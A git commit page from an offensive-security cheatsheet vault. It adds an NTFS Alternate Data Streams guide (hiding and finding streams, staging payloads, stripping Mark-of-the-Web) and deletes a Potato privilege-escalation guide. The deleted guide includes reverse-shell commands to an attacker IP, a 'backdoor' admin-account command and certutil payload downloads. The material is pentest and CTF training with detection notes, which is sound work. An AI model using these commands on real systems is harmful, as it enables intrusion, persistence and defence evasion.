daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit 073ee579d4cb0d1d5292b748731dd999663bfd3c
parent ac5150025625721c187639dab92e9c3b125642e9
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Thu, 17 Sep 2026 01:32:39 +0100

Split Potato Attacks & ADS guide into two sheets

The combined guide mixed two independent topics — SeImpersonate potato
techniques and NTFS Alternate Data Streams — under one page. Split into:

- potato-attacks-guide.md: the potato family, delivery, and the field
  method for landing SYSTEM (unchanged content, ADS-specific material
  removed and replaced with links out to the new ADS guide).
- alternate-data-streams-guide.md: ADS mechanics (reading, writing,
  finding, Mark-of-the-Web, cleanup), now led with a dedicated
  'Finding streams' section and a worked example (HTB Jeeves'
  hm.txt:root.txt:$DATA) of discovering and reading hidden data —
  the same shape as the Windows PrivEsc / Alternate Data Streams
  material this vault already treats as first-class rather than a
  potato-attacks footnote.

Cross-links updated both directions (including the field-method step 5
anchor and the worked-example anchor), and the one inbound reference
from windows-privesc-cpts.md now points at both new pages.

Diffstat:
Asrc/content/sheets/pentest-workflow/alternate-data-streams-guide.md | 258+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dsrc/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md | 763-------------------------------------------------------------------------------
Asrc/content/sheets/pentest-workflow/potato-attacks-guide.md | 617+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/content/sheets/pentest-workflow/windows-privesc-cpts.md | 2+-
4 files changed, 876 insertions(+), 764 deletions(-)

diff --git a/src/content/sheets/pentest-workflow/alternate-data-streams-guide.md b/src/content/sheets/pentest-workflow/alternate-data-streams-guide.md @@ -0,0 +1,258 @@ +--- +title: "NTFS Alternate Data Streams — Hiding & Finding Hidden Data" +description: "Windows NTFS Alternate Data Streams (ADS): what they are, reading and writing them, finding streams other users hid (dir /r, Get-Item -Stream, streams.exe), Mark-of-the-Web, and a worked HTB example of digging a flag out of a stream." +category: pentest-workflow +subcategory: "Companion Guides" +order: 26 +tags: ["htb", "cpts", "windows", "ads", "alternate-data-streams", "ntfs", "mark-of-the-web", "forensics", "pentest-workflow"] +tools: ["streams.exe"] +difficulty: intermediate +updated: "2026-09-17" +source: "vault:NTFS ADS tradecraft" +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [← Potato Attacks guide](/sheets/pentest-workflow/potato-attacks-guide) + +# NTFS Alternate Data Streams — Hiding & Finding Hidden Data `ris:FileList` + +> [!dashboard] What this is +> NTFS Alternate Data Streams (ADS) let a file carry extra content that a normal directory listing never shows. On offense, that's a place to stage a payload off a directory listing and strip Mark-of-the-Web before you run it — a trick usually paired with the [Potato Attacks guide](/sheets/pentest-workflow/potato-attacks-guide) once you've got a privileged shell. On the other side of the same coin, it's where CTF flags, credentials, and second-stage tooling get hidden, and where a downloaded file's origin gets recorded — so knowing how to *find* a stream matters as much as knowing how to hide one. They're a legitimate NTFS feature, quietly used (and abused) for both since Windows NT. + +## What an ADS actually is + +On NTFS, every file has at least one data stream — the **default (unnamed) stream** that holds the content you normally see. NTFS lets you attach additional **named streams** to the same file. The main file keeps its name and its reported size; the extra streams ride along invisibly. + +**Syntax:** `filename:streamname:streamtype` + +Common stream types: + +| Type | Purpose | +|---|---| +| `$DATA` | Actual data content — by far the most common, and what you'll use | +| `$INDEX_ALLOCATION` | Directory indexes (attaching this to a name creates a directory-like object) | +| others | Assorted NTFS metadata streams | + +Why it matters to both sides of the keyboard: + +- **Invisible to normal listings.** Plain `dir` and Explorer don't show streams — you need `dir /r` or PowerShell's `-Stream`. +- **They don't change the file's reported size.** The host file still shows its original size; the stream's bytes aren't counted. +- **They travel with the file on NTFS**, and are **silently stripped** when the file crosses to FAT32/exFAT, most network shares, email, or an HTTP upload. Handy for evasion; a trap if you rely on a stream surviving a copy. +- **No special permission needed.** If you can write the file, you can add a stream to it. Reading one someone else hid just needs read access to the host file, same as normal. + +--- + +## Finding streams — the part that matters most `fas:MagnifyingGlass` + +This is the question that actually comes up on an engagement or a box: *does this file have anything hidden on it?* Plain `dir` and Explorer will never tell you — you have to ask specifically. + +```batch +:: cmd — /r reveals streams next to each file (look for the "file:stream:$DATA" lines) +dir /r C:\Users\Administrator\Desktop +``` + +A tell-tale stream line looks like this — a file whose visible content is tiny, carrying a named `$DATA` stream beside it: + +```text + 36 hm.txt + 34 hm.txt:root.txt:$DATA +``` + +That second line is the whole discovery: `hm.txt` has a named stream called `root.txt`. Nothing about the plain `36 hm.txt` line hints at it. + +```powershell +# PowerShell — list every stream on one file +Get-Item C:\Windows\Temp\notes.txt -Stream * + +# Hunt an entire tree for anything carrying a non-default stream +Get-ChildItem C:\Users -Recurse -ErrorAction SilentlyContinue | ForEach-Object { + Get-Item $_.FullName -Stream * -ErrorAction SilentlyContinue +} | Where-Object Stream -ne ':$DATA' +``` + +```batch +:: Sysinternals streams.exe — purpose-built, recursive, works from cmd with no PowerShell +streams.exe -s C:\Users +``` + +> [!tip]+ Which one to reach for +> `fas:Lightbulb` +> `dir /r` is the reflex — it's always available, no PowerShell or extra tooling needed, and works from a one-shot non-interactive command just as well as an interactive shell. Reach for the PowerShell recursive hunt or `streams.exe` when you want to sweep an entire profile or drive at once instead of checking directory-by-directory. + +--- + +## Reading a stream + +Once you know the stream's name (from `dir /r` or `-Stream *`), read it: + +```batch +:: cmd — the classic +more < "C:\Windows\Temp\notes.txt:hidden:$DATA" +``` + +```powershell +# PowerShell — cleanest +Get-Content C:\Windows\Temp\notes.txt -Stream hidden + +# notepad opens a named stream directly +notepad C:\Windows\Temp\notes.txt:hidden +``` + +> [!warning]+ `more <` needs the redirect — a direct path won't work +> `fas:TriangleExclamation` +> `more C:\path\file.txt:stream` (no `<`) fails; `type file.txt:stream` also fails on most builds. The reliable cmd form is `more < "path:stream"`, using input redirection rather than passing the ADS path as a normal argument. + +--- + +## Finding hidden data — a worked example + +The scenario above (`hm.txt` with a `root.txt:$DATA` stream) is a real one, from HTB Jeeves, and it's the exact shape almost every "hidden flag" or "hidden credential" ADS challenge takes: a small, boring-looking file sitting next to something that matters. Walking through it end to end: + +**1. You get a shell in a context that can see the file** — here, `NT AUTHORITY\SYSTEM`, reached via the potato chain worked through in the [Potato Attacks guide's field method](/sheets/pentest-workflow/potato-attacks-guide#5--once-youre-system-fasmagnifyingglass). If you're already Administrator/SYSTEM (or it's just your own file), skip straight to step 2. + +**2. Sweep for streams instead of trusting a plain `dir`:** + +```batch +dir /r C:\Users\Administrator\Desktop +``` +```text + Directory of C:\Users\Administrator\Desktop + +11/08/2017 10:05 AM <DIR> . +11/08/2017 10:05 AM <DIR> .. +12/24/2017 03:51 AM 36 hm.txt + 34 hm.txt:root.txt:$DATA +11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk + 2 File(s) 833 bytes +``` + +The `hm.txt:root.txt:$DATA` line is the tell — a 34-byte stream named `root.txt` riding on a 36-byte host file that gives no other hint it's there. + +**3. Read the stream directly:** + +```batch +more < hm.txt:root.txt +``` + +That's the whole technique — no potato, no privilege escalation needed *for this step*; the only privilege that mattered was whatever let you read `hm.txt` in the first place (here, being SYSTEM to reach another user's Desktop). + +**4. From a non-interactive shell** (a potato firing one command and exiting, a web shell, anything without a live prompt), redirect both the listing and the read to files you can pull back: + +```batch +:: find it +... "/c dir /r C:\Users\Administrator\Desktop > C:\Users\kohsuke\ads.txt 2>&1" +type C:\Users\kohsuke\ads.txt + +:: read it +... "/c more < C:\Users\Administrator\Desktop\hm.txt:root.txt > C:\Users\kohsuke\flag.txt 2>&1" +type C:\Users\kohsuke\flag.txt +``` + +> [!success]+ The pattern, generalised +> `fas:Lightbulb` +> 1. **`dir /r` (or the PowerShell/`streams.exe` sweep) on every directory you land in that you haven't checked** — Desktop, Documents, profile roots, web roots. A tiny file next to something sensitive-sounding is the classic tell. +> 2. **`more < file:stream`** reads it once you have the stream name. No stream name shown by `dir /r`? You don't have one — move on. +> 3. **No live shell?** Redirect the command's own output to a file (`> out.txt 2>&1`) and `type`/pull it back, exactly like any other non-interactive command. + +--- + +## Writing / staging into a stream + +The reverse of the above — this is how those hidden files get created in the first place, and how you'd stage your own payload the same way. + +```batch +:: Hide text +echo secret-loot-here > "C:\Windows\Temp\notes.txt:stash" + +:: Stash a binary inside an innocuous host file (NTFS→NTFS copy) +type C:\Tools\GodPotato-NET4.exe > "C:\Windows\Temp\log.txt:g.exe" +``` + +```powershell +# PowerShell staging +Set-Content -Path C:\Windows\Temp\notes.txt -Stream stash -Value 'secret-loot-here' +``` + +> [!warning]+ Running an EXE straight from a stream is mostly dead on modern Windows +> `fas:TriangleExclamation` +> Older Windows let you launch a process whose image *was* an ADS. Current builds block that — `start file.txt:g.exe` / `Start-Process` against a stream fails. So use ADS for **staging and hiding**, then **copy the payload back out to a normal file to execute it**: +> ```batch +> type C:\Tools\GodPotato-NET4.exe > C:\Windows\Temp\log.txt:g.exe :: hide +> more < C:\Windows\Temp\log.txt:g.exe > C:\Windows\Temp\g.exe :: extract to run +> C:\Windows\Temp\g.exe -cmd "cmd /c whoami" +> ``` +> Script and DLL loaders (`powershell`, `wscript`/`cscript`, `rundll32`, `regsvr32`) can still be *fed* from a stream via LOLBINs, but the reliable, portable pattern is stage-in-stream → extract → run. See the [Potato Attacks guide](/sheets/pentest-workflow/potato-attacks-guide) for what to do once you're running as SYSTEM. + +--- + +## Mark-of-the-Web — the ADS you meet every engagement + +Every file a browser or `Invoke-WebRequest` downloads gets a `Zone.Identifier` stream (Mark-of-the-Web). It's what makes SmartScreen and Defender treat a file as "from the internet." Reading it is a forensics staple; stripping it is an evasion staple. + +```powershell +# See where a downloaded file came from (blue-team / OSINT gold — often has the source URL) +Get-Content .\PrintSpoofer64.exe -Stream Zone.Identifier + +# Strip MOTW so SmartScreen/Defender stop nagging (two equivalent ways) +Remove-Item .\PrintSpoofer64.exe -Stream Zone.Identifier +Unblock-File .\PrintSpoofer64.exe +``` + +```batch +:: The stealthiest way to drop MOTW is to never create it: pull the tool with a +:: transport that doesn't write Zone.Identifier (SMB copy, certutil), not a browser. +certutil -urlcache -f http://10.10.14.3/PrintSpoofer64.exe C:\Windows\Temp\ps.exe +``` + +--- + +## Removing a stream + +```powershell +# Delete just one stream, keep the file +Remove-Item C:\Windows\Temp\notes.txt -Stream stash +``` + +```batch +:: cmd has no native single-stream delete — round-trip through a non-NTFS +:: filesystem (copy off to FAT/exFAT and back) strips every stream at once. +``` + +--- + +## Detection, OPSEC & cleanup `fas:Shield` + +> [!danger] Authorised testing only +> `fas:TriangleExclamation` +> Reading another user's files (even via a stream) and hiding artefacts on a real host both need explicit authorisation. Track every stream you create, with full paths, and remove it at cleanup. + +**What the blue team sees:** + +| Signal | Where | +|---|---| +| New `$DATA` streams appearing on files | Sysmon Event 15 (`FileCreateStreamHash`) | +| A downloaded tool's `Zone.Identifier` still naming your web server | ADS on the artefact itself | +| Unusual `dir /r` / `Get-Item -Stream *` / `streams.exe` invocations in command-line logging | Sysmon Event 1, PowerShell script-block logging | + +**OPSEC notes:** + +- ADS defeats a plain `dir` and a size check, not a defender who runs `dir /r` / `streams.exe` — treat it as *reduces casual visibility*, not *invisible*. +- Sysmon Event 15 logs stream creation by hash on a well-instrumented estate; don't assume staging in a stream is silent there. + +**Cleanup checklist:** + +```powershell +Remove-Item C:\Windows\Temp\log.txt -Stream g.exe -ErrorAction SilentlyContinue # the ADS +Remove-Item C:\Windows\Temp\notes.txt -Stream stash -ErrorAction SilentlyContinue +``` + +--- + +## References `fas:BookOpen` + +| Topic | Source | +|---|---| +| NTFS ADS / Mark-of-the-Web | [MITRE ATT&CK T1564.004](https://attack.mitre.org/techniques/T1564/004/) · [Sysinternals streams](https://learn.microsoft.com/sysinternals/downloads/streams) | + +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [← Potato Attacks guide](/sheets/pentest-workflow/potato-attacks-guide) diff --git a/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md b/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md @@ -1,762 +0,0 @@ ---- -title: "Potato Attacks & Alternate Data Streams — Full Guide" -description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, plus NTFS Alternate Data Streams for staging, hiding, and stripping Mark-of-the-Web." -category: pentest-workflow -subcategory: "Companion Guides" -order: 25 -tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "ads", "alternate-data-streams", "ntfs", "mark-of-the-web", "pentest-workflow"] -tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell", "streams.exe"] -difficulty: advanced -updated: "2026-09-15" -source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks) + NTFS ADS tradecraft" ---- - -[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) - -# Potato Attacks & Alternate Data Streams — Full Guide `fas:ClipboardList` - -> [!dashboard] What this is -> The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts#2--token-privilege-abuse). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, shows how to deliver them from an MSSQL shell / IIS web shell / WinRM, and then covers **NTFS Alternate Data Streams** — the trick you pair with the potatoes to stage the binary off a directory listing and strip Mark-of-the-Web before you run it. - -Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token. - -## The gate check — do you even have a potato path? `fas:Terminal` - -Everything here lives or dies on one line. Run it first, every time: - -```batch -whoami /priv -``` - -You are looking for either of these in the **Enabled** state: - -| Privilege | What it lets you do | Who usually has it | -|---|---|---| -| `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts | -| `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts | - -> [!warning]+ No privilege, no potato -> `fas:TriangleExclamation` -> If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal. - -### How a potato works (the shared skeleton) - -Every tool below follows the same three beats. Only step 1 changes between them. - -<figure class="flow plate corners"> - <figcaption class="flow__cap"><span class="flow__kind">The potato pattern — four beats</span><span class="flow__dir">LR</span></figcaption> - <div class="flow__body"> - <div class="flow__diagram" data-dir="lr"> - <div class="flow-rank"><div class="flow-node is-entry">1 · Coerce SYSTEM to authenticate<span class="sub">to a listener you control</span><span class="sub">(Spooler pipe / DCOM OXID / EFS RPC)</span></div></div> - <div class="flow-edge"></div> - <div class="flow-rank"><div class="flow-node">2 · Catch the auth and negotiate<span class="sub">a SYSTEM security context</span><span class="sub">(NTLM / SSPI)</span></div></div> - <div class="flow-edge"></div> - <div class="flow-rank"><div class="flow-node">3 · Impersonate the SYSTEM token<span class="sub">(needs SeImpersonate)</span></div></div> - <div class="flow-edge"></div> - <div class="flow-rank"><div class="flow-node is-goal">4 · CreateProcessWithToken / AsUser<span class="sub">→ your command runs as SYSTEM</span></div></div> - </div> - </div> -</figure> - -The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques. - -> [!success]+ Grab the binaries — checksum-verified, offline mirror -> `fas:Toolbox` -> Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box: -> - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) -> - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) -> - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) -> - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) -> - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) -> - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) -> -> Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato). - ---- - -## Which potato, when? `fas:Route` - -Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first. - -| Tool | Coercion primitive | Needs | Works on | Reach for it when | -|---|---|---|---|---| -| **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. | -| **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. | -| **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. | -| **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. | -| **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. | -| **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. | - -<figure class="flow plate corners"> - <figcaption class="flow__cap"><span class="flow__kind">Which potato? — a fallback ladder</span><span class="flow__dir">TD</span></figcaption> - <div class="flow__body"> - <svg class="flow-svg" viewBox="0 0 630 720" role="img" aria-label="Decision tree for choosing a potato privilege-escalation tool, falling through PrintSpoofer, GodPotato, SweetPotato, JuicyPotatoNG and RoguePotato as each fails"> - <path class="fedge" d="M360,90 L360,150" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,90 L300,120 L120,120 L120,150" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,210 L300,240 L120,240 L120,270" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M420,210 L420,240 L470,240 L470,270" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M235,300 L355,300" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M470,330 L470,390" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M470,450 L470,510" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M470,570 L470,630" marker-end="url(#flow-arrow)" /> - <g class="fnode is-decision"><rect class="fnode__box" x="245" y="30" width="230" height="60" /><text class="fnode__label" x="360" y="48" text-anchor="middle">whoami /priv:<tspan class="sub" x="360" dy="14">SeImpersonate or</tspan><tspan class="sub" x="360" dy="14">SeAssignPrimaryToken?</tspan></text></g> - <g class="fnode is-note"><rect class="fnode__box" x="5" y="150" width="230" height="60" /><text class="fnode__label" x="120" y="176" text-anchor="middle">Not a potato box —<tspan class="sub" x="120" dy="15">services / registry / creds / kernel</tspan></text></g> - <g class="fnode is-decision"><rect class="fnode__box" x="245" y="150" width="230" height="60" /><text class="fnode__label" x="360" y="176" text-anchor="middle">Print Spooler<tspan class="sub" x="360" dy="15">service running?</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="5" y="270" width="230" height="60" /><text class="fnode__label" x="120" y="296" text-anchor="middle">PrintSpoofer<tspan class="sub" x="120" dy="15">(interactive SYSTEM shell)</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="355" y="270" width="230" height="60" /><text class="fnode__label" x="470" y="296" text-anchor="middle">GodPotato<tspan class="sub" x="470" dy="15">(pick NET4 / NET35 by runtime)</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="355" y="390" width="230" height="60" /><text class="fnode__label" x="470" y="416" text-anchor="middle">SweetPotato -e EfsRpc<tspan class="sub" x="470" dy="15">or EfsPotato (swap RPC pipe)</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="355" y="510" width="230" height="60" /><text class="fnode__label" x="470" y="536" text-anchor="middle">JuicyPotatoNG<tspan class="sub" x="470" dy="15">(-s to seek a CLSID)</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="355" y="630" width="230" height="60" /><text class="fnode__label" x="470" y="656" text-anchor="middle">RoguePotato<tspan class="sub" x="470" dy="15">(+ socat :135 redirector)</tspan></text></g> - <g class="felabel"><rect class="felabel__box" x="343" y="112" width="34" height="16" /><text class="felabel__text" x="360" y="123" text-anchor="middle">Yes</text></g> - <g class="felabel"><rect class="felabel__box" x="197" y="112" width="26" height="16" /><text class="felabel__text" x="210" y="123" text-anchor="middle">No</text></g> - <g class="felabel"><rect class="felabel__box" x="193" y="232" width="34" height="16" /><text class="felabel__text" x="210" y="243" text-anchor="middle">Yes</text></g> - <g class="felabel"><rect class="felabel__box" x="432" y="232" width="26" height="16" /><text class="felabel__text" x="445" y="243" text-anchor="middle">No</text></g> - <g class="felabel"><rect class="felabel__box" x="274" y="292" width="42" height="16" /><text class="felabel__text" x="295" y="303" text-anchor="middle">fails</text></g> - <g class="felabel"><rect class="felabel__box" x="449" y="352" width="42" height="16" /><text class="felabel__text" x="470" y="363" text-anchor="middle">fails</text></g> - <g class="felabel"><rect class="felabel__box" x="449" y="472" width="42" height="16" /><text class="felabel__text" x="470" y="483" text-anchor="middle">fails</text></g> - <g class="felabel"><rect class="felabel__box" x="395" y="592" width="150" height="16" /><text class="felabel__text" x="470" y="603" text-anchor="middle">DCOM blocked outbound</text></g> - </svg> - </div> -</figure> - ---- - -## PrintSpoofer `fas:Terminal` - -**Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC. - -**Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato. - -```batch -:: Interactive SYSTEM shell in your current console — the go-to -PrintSpoofer64.exe -i -c cmd - -:: Fire a single command as SYSTEM (non-interactive) -PrintSpoofer64.exe -c "whoami" -PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add" - -:: Reverse shell back to your handler (catch with: nc -lnvp 8443) -PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" - -:: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop) -PrintSpoofer64.exe -d 1 -c cmd -``` - -| Flag | Meaning | -|---|---| -| `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) | -| `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell | -| `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) | -| `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) | -| `-h` | Help | - -> [!tip]+ Everything PrintSpoofer can do -> `fas:Lightbulb` -> Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered. - ---- - -## GodPotato `fas:Terminal` - -**Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler. - -**Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`. - -```batch -:: Prove it — run whoami as SYSTEM -GodPotato-NET4.exe -cmd "cmd /c whoami" - -:: Add a local admin / new user -GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add" -GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add" - -:: Reverse shell (catch with nc -lnvp 8443) -GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" - -:: .NET 3.5-only host -GodPotato-NET35.exe -cmd "cmd /c whoami" -``` - -| Flag | Meaning | -|---|---| -| `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) | -| `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) | -| `-h` | Help | - -> [!tip]+ Everything GodPotato can do -> `fas:Lightbulb` -> Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt. - ---- - -## JuicyPotatoNG `fas:Terminal` - -**Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato. - -**Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG). - -```batch -:: Default run — uses a built-in working CLSID and port 10247, runs cmd -JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" - -:: Reverse shell -JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" - -:: Let it seek a usable CLSID for this exact build -JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami" - -:: Custom COM listen port if 10247 is taken -JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami" -``` - -| Flag | Meaning | -|---|---| -| `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both | -| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | -| `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) | -| `-l <PORT>` | Local COM server listen port (default `10247`) | -| `-c <CLSID>` | Use a specific CLSID instead of the built-in default | -| `-s` | Seek — probe for a CLSID that works on this host | -| `-b` | Bruteforce all CLSIDs (loud; last resort) | -| `-i` | Interactive (run the program in the current console) | - -> [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato -> `fas:Lightbulb` -> The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 